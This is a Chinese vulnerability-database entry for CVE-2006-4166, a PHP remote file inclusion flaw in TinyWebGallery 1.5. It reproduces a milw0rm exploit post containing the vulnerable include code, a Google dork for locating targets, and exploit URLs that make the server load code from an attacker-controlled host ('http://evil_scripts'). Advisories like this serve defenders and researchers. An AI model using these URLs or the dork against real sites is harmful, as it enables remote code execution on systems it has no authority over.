TinyWebGallery 'image.php和image.php2' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110787 漏洞类型 未知
发布时间 2006-08-09 更新时间 2006-08-16
CVE编号 CVE-2006-4166 CNNVD-ID CNNVD-200608-250
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2158
https://www.securityfocus.com/bid/83231
https://cxsecurity.com/issue/WLB-2006080102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-250
|漏洞详情
TinyWebGallery1.5及早期版本存在PHP远程文件包含漏洞,远程攻击者可以借助提交到(1)image.php脚本或(2)image.php2脚本的image参数中的URL执行任意PHP代码。
|漏洞EXP
####################################################
#                                                  #
#                                                  #
#           C Y B E R - W A R R i O R   T I M      #
#                                                  #
#                                                  #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

###########################################################################
#                                                                         #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends  #
#                                                                         #
###########################################################################

# milw0rm.com [2006-08-09]
|受影响的产品
Tinywebgallery Tinywebgallery 1.5 Tinywebgallery Tinywebgallery 1.4 Tinywebgallery Tinywebgallery 1.3
|参考资料

来源:XF
名称:tinywebgallery-image-file-include(28317)
链接:http://xforce.iss.net/xforce/xfdb/28317
来源:BUGTRAQ
名称:20060816Re:TinyWebGalleryv1.5(image)RemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443353/100/0/threaded
来源:BUGTRAQ
名称:20060810TinyWebGalleryv1.5(image)RemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442818/100/0/threaded
来源:MILW0RM
名称:2158
链接:http://www.milw0rm.com/exploits/2158
来源:SECTRACK
名称:1016682
链接:http://securitytracker.com/id?1016682
来源:BUGTRAQ
名称:20060904Re:TinyWebGalleryv1.5(image)RemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/445089/100/0/threaded
来源:SREASON
名称:1393
链接:http://securityreason.com/securityalert/1393
来源:MILW0RM
名称:2158
链接:http://milw0rm.com/exploits/2158